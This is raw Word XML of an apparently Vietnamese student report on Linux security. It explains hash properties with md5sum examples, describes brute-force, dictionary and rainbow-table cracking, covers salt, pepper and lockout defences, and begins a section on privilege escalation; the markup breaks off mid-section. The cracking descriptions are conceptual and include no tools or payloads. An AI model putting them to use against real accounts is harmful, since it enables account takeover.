          <w:numId w:val="18"/>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Quick to compute: Thời gian hash nhanh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E476C3" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Use the Avalanche Effect: Chỉ một thay đổi nhỏ giá trị đầu vào sẽ thay đổi tối thiểu 50% giá trị đầu ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACE97C" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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hould avoid or eliminate collisions: Vì chúng ta nhận giá trị đầu vào bất kể độ dài và thường sẽ xuất ra các giá trị có cùng độ dài, nên việc có 2 giá trị khác nhau nhưng lại có cùng kết quả xuất ra là điều tuy hiếm nhưng hoàn toàn có thể xảy ra. Do đó một thuật toán hash tốt phải tránh được điều đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0786214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ó rất nhiều thuật toán hash đang được sử dụng để bảo vệ dữ liệu người dùng như BCRYPT, SCRYPT, Argon2, v.v.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB845FD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc90050726"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.3. Ứng dụng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="1B61CB89" w14:textId="2E6F5EE9"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Hashing có rất nhiều ứng dụng trong đời sống, một trong những ứng dụng đó là quản lý mật khẩu người dùng đối với các nền tảng cho phép người dùng tạo mật khẩu để đăng nhập. Cơ chế hoạt động của các nền tảng này khá đơn giản, khi đăng ký tài khoản, hệ thống sẽ lưu 2 giá trị là username và password, 2 giá trị này chính là thứ giúp đăng nhập vào hệ thống. Riêng đối với mật khẩu, chúng sẽ được lưu trữ dưới dạng mã hash để đảm bảo tính bảo mật. Khi đăng nhập hệ thống sẽ so khớp 2 giá trị là username và password của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nhập vào sau khi hash có trùng với hai giá trị đã được lưu trữ ở cơ sở dữ liệu hay không. Nếu đúng,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sẽ được cấp quyền để truy cập vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA0B55" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc90050727"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1.4. Hashing với Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="0F21771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rong Linux, chúng ta có thể tương tác với một trong hai phương pháp băm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1DA6A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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D5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084C510" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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HA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2088C54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ông cụ để mã hóa này được tích hợp trong phần lớn các phiên bản Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A047BF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Linux sử dụng hash trong nhiều nơi và nhiều tình huống. Người dùng có thể tạo dựng một tình huống một cách thủ công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915CB9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ách hash một chuỗi ký tự đơn giản với Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431280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ể hash một chuỗi ký tự đơn giản trong Linux ta sử dụng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9F7F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echo -n “&lt;Chuỗi ký tự&gt;” | &lt;Chuẩn hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A09D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Ví dụ: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928011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78DCF17F" wp14:editId="4F2987DA">
            <wp:extent cx="4305300" cy="981075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="398"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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4305300" cy="981075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE27C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lệnh trên có nghĩa là chúng ta sẽ xuất ra giá trị “levancuong” bằng lệnh echo. Flag -n dùng để không xuống dòng sau khi đã xuất ra chuỗi “levancuong”. Sau đó chuỗi này sau khi xuất ra sẽ được hash qua lệnh md5sum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2009742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iếp theo chúng ta sẽ tiến hành hash chuỗi “levancuong1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAF5F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074D93A2" wp14:editId="462574BC">
            <wp:extent cx="4419600" cy="714375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4419600" cy="714375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A8B6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Như chúng ta có thấy, chỉ thêm giá trị “1” vào “levancuong” chúng ta thấy hiệu ứng Avalanche hoạt động như thế nào. Giá trị hash của “levancuong” và “levancuong1” gần như hoàn toàn khác nhau và dù thêm 1 ký tự, cả hai chuỗi hash đều có cùng độ dài đủ 32 ký tự hex:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4842A84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25FC23B2" wp14:editId="54F21D82">
            <wp:extent cx="4333875" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4333875" cy="1600200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DF4D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ash ký tự “1”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7E36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húng ta sẽ thử hash ký tự “1” xem kết quả hash sẽ như thế nào</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120AEE5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6762E6C1" wp14:editId="583B74D8">
            <wp:extent cx="4276725" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4276725" cy="914400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865200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húng ta có thể thấy, dù chỉ hash có 1 ký tự, chúng ta vẫn nhận được một chuỗi hash đủ 32 ký tự hex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A390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ash lại chuỗi “levancuong”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBB4B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7BFE7089" wp14:editId="6B303173">
            <wp:extent cx="4324350" cy="857250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4324350" cy="857250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63118AA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 thấy giá trị của chuỗi kỹ tự “levancuong” qua 2 lần hash đều như nhau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33011A4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32E60862" wp14:editId="3DDC57F7">
            <wp:extent cx="4410075" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="401"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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4410075" cy="3181350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C593DE7" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc90050728"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1.5. Các hình thức hash cracking phổ biến</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="16A89E4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Như ở phần trên đã trình bày hashing là hình thức mã hóa dữ liệu một chiều và việc lật ngược quy trình hash từ dữ liệu đã được hash để tìm ra dữ liệu gốc gần như là điều bất khả thi. Vì lẽ đó các hackers và pentesters thường sử dụng giải pháp “đoán mò” mật khẩu để crack hash. Tuy nhiên, để tối ưu hóa việc “đoán mò” mật khẩu sao cho hiệu quả và ít tốn thời gian nhất, chúng ta sẽ có các giải pháp sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCD286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rute force attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229458C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ackers hoặc pentesters sử dụng những phần mềm chuyên dụng và dựa vào bảng chữ cái, bảng chữ số, ký tự đặc biệt (từ 1 đến 10, từ a đến z, từ A đến Z và các kí tự đặc biệt) để tạo ra vô hạn các kết hợp. Các kết hợp này sẽ được gửi đến server mục tiêu để hash và so sánh với dữ liệu hash đã được lưu trong cơ sở dữ liệu của mục tiêu. Quá trình này diễn ra cho đến khi tìm được password thật của account. Cách này cực kỳ mất thời gian. Và để tối ưu hóa, người ta thường sử dụng nhiều GPU siêu mạnh cùng một lúc để giảm thời gian bruteforce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F98B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492779B1" wp14:editId="0A7468C6">
            <wp:extent cx="3209925" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3209925" cy="1419225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731D7E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Dictionary attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E34A0B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ackers hoặc pentesters sẽ có một danh sách những username và password hay được sử dụng nhất. Hoặc một từ điển của ngôn ngữ mà đối tượng sử dụng. Sau đó, họ sử dụng những phần mềm chuyên dụng để thử mọi kết quả username và password có trong danh sách hoặc từ điển đó cho đến khi nào tìm ra được username và password mới thôi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405961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ách này rất mất thời gian vì danh sách để thử thường rất dài và thành công hay không phụ thuộc hoàn toàn vào việc username và password của mục tiêu có nằm bên trong danh sách mà hackers có hay không?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055BF0D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Do đó để tối ưu hóa, hackers hoặc pentesters thường nghiên cứu mục tiêu rất kỹ và càng nhiều thông tin cá nhân của nạn nhân như: ngày tháng năm sinh, số điện thoại, địa chỉ,.....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333EF1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ây đều sẽ là những thông tin hữu ích giúp hacker hoặc pentester thêm được các từ khóa quan trọng vào danh sách của mình nhằm tăng khả năng tấn công thành công vì người dùng thường hay đặt password dựa vào các thông tin này để dễ nhớ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A68A7B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Rainbow table attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF6E73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rong quá trình crack hash, phần lớn thời gian tiêu tốn nằm ở việc hash username và password. Để giải quyết vấn đề đó, rainbow table đã ra đời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1099E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Rainbow table là một cơ sở dữ liệu tập hợp các kết hợp username và password đã được hash ở nhiều thuật toán hash khác nhau. Vì lẽ đó kích thước của một rainbow table thường rất lớn, có thể lên tới hàng trăm GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDB904" w14:textId="222BFD91"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Để sử dụng được rainbow table, cần phải bằng cách nào đó, có được danh sách chứa password hash của tất cả người dùng được chứa trong cơ sở dữ liệu của mục tiêu. Sau đó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sẽ sử dụng các phần mềm chuyên dụng để so sánh các kết quả hash từ danh sách thu được với cơ sở dữ liệu của rainbow table cho đến khi tìm ra được hash có cùng giá trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDFB6D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Lúc này, chúng ta có thể dễ dàng dựa vào rainbow table để tìm ra được password hoặc chuỗi ký tự cho ra cùng giá trị hash (trong trường hợp hash collision xảy ra). Vì dữ liệu được dùng để xác thực người dùng là dữ liệu hash, nên dù khác mật khẩu nhưng lại xảy ra hash collision dẫn đến hai giá trị hash giống nhau, chúng ta vẫn có thể đăng nhập vào tài khoản mục tiêu được như bình thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0475BDD5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc90050729"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.6. Cách phòng chống hash cracking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="34004D8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ể chống lại brute force attack và dictionary attack, các hệ thống hiện đại ngày nay sẽ tự động khóa tài khoản nếu người dùng nhập sai mật khẩu quá số lần quy định. Lần đầu có thể là khóa trong 15 hay 30 phút, nếu tình trạng vẫn tiếp diễn, tài khoản sẽ bị khóa cho đến khi người sở hữu tài khoản liên lạc với nhà cung cấp dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABE46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ể chống lại rainbow table attacks, người ta thường hay dùng salt và pepper. Salt và pepper là 2 chuỗi giá trị được hệ thống tạo ra ngẫu nhiên để thêm vào password trước khi hash nhằm tăng cường sức mạnh cho password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66168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Ứng dụng thực tế của salt và pepper như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A8A4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Với salt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18058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hi lưu password vào cơ sở dữ liệu, sẽ có trường hợp 2 hoặc nhiều hơn 2 người dùng sử dụng password giống nhau. Điều này dẫn đến việc nếu hacker có được danh sách password hash, và tìm ra được password trước khi hash của 1 trong số những người có password giống nhau này, thì khả năng tất cả những người này bị mất tài khoản là điều chắc chắn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26992BA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ể tránh điều đó xảy ra, trước khi hash password, hệ thống sẽ tự động tạo và thêm một chuỗi giá trị được gọi là salt vào password trước khi hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C085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ỗi người dùng sẽ có một chuỗi salt khác biệt và chuỗi salt này chỉ có duy nhất hệ thống tạo ra nó biết. Chuỗi salt này có thể được thêm vào đầu hoặc cuối của password trước khi hash và được lưu trữ tại cùng cơ sở dữ liệu với nơi lưu trữ password hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D49FD8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Với pepper:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8FF5C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Pepper (hay còn được gọi là secret salt) có chức năng tương tự như salt, nhưng pepper được tạo ra để đề phòng trường hợp cơ sở dữ liệu chứa password hash và salt bị hackers truy cập thành công và lấy được tất cả dữ liệu lưu tại đây. Vì lẽ đó pepper không được lưu trong cơ sở dữ liệu chứa password hash và salt mà được lưu ở những nơi có độ an toàn cao hơn trong hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD526D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Như vậy, dù cho hackers có nắm được password hash và salt, chúng cũng không thể tìm ra password gốc dựa vào rainbow table attacks được vì thiếu giá trị của pepper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3EF0FF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc90050730"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2. Leo thang đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="3CB05502" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc90050731"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.1. Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="53B9F68E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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ự leo thang đặc quyền diễn ra bất cứ khi nào kẻ tấn công mạng triển khai lỗi, lỗ hổng thiết kế hoặc bất kỳ dạng lỗi cấu hình nào trong ứng dụng hoặc hệ điều hành để giành quyền truy cập cao và trực tiếp vào các tài nguyên thường không có sẵn cho người dùng. Kẻ tấn công hiện sử dụng các đặc quyền kiếm được để đánh cắp dữ liệu bí mật và triển khai phần mềm độc hại với mục đích làm hỏng hệ điều hành, các ứng dụng máy chủ và cuối cùng là danh tiếng của một tổ chức. Loại tấn công vào dữ liệu tổ chức này có thể được thực hiện ngay cả bởi một tin tặc không tinh vi để đạt được các đặc quyền ngày càng tăng, lý do là hầu hết các tổ chức kinh doanh không sử dụng đủ các biện pháp bảo mật và kiểm soát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203494B5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc90050732"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.2. Các loại leo thang đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="1C39A58B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>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au đây là hai loại tấn công leo thang đặc quyền:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A908B67" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="0"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Nâng cấp đặc quyền theo chiều ngang:  Trong hình thức tấn công này, tin tặc vẫn ở cùng mức đặc quyền của người dùng; tuy nhiên, họ có thể truy cập dữ liệu và chức năng của các tài khoản khác không có sẵn với tài khoản hiện có. Nói về các ứng dụng web, một ví dụ về leo thang đặc quyền theo chiều ngang có thể có nghĩa là giành được quyền truy cập vào hồ sơ của người dùng khác có sẵn bằng kỹ thuật số.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640DA51" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="0"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Nâng cấp đặc quyền theo chiều dọc:  Việc leo thang đặc quyền theo chiều dọc được coi là nguy hiểm hơn leo thang đặc quyền theo chiều ngang. Nâng cấp đặc quyền thường được gọi là nâng cao đặc quyền. Trong hình thức tấn công này, kẻ tấn công bắt đầu từ tài khoản có đặc quyền thấp hơn bằng cách lấy quyền của người dùng cao hơn và mạnh mẽ hơn, như quản trị viên hệ thống. Theo cuộc tấn công leo thang đặc quyền này, kẻ tấn công có thể phá vỡ hệ thống và ứng dụng của những người khác bằng cách lấy đi thông tin đăng nhập và dữ liệu quan trọng khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41041E7B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc90050733"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3. Cơ sở lý thuyết: Sudo - Superuser Do root privilege task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="56123258" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc90050734"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2.3.1. Root User</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="132235C2"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Root user là một "superuser account" trong Linux/Unix. Có mọi quyền và có thể làm bất cứ điều gì với hệ thống. Thông thường Root user sẽ có tên là root. Tuy nhiên trong Linux/Unix, bất kỳ account nào với user id là 0 đều là tài khoản root, bất kể tên </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>là gì, không nhất thiết phải là tên root. Một user bình thường muốn chạy được các lệnh có quyền Root cần phải thông qua su hoặc sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22751A83" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc90050735"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
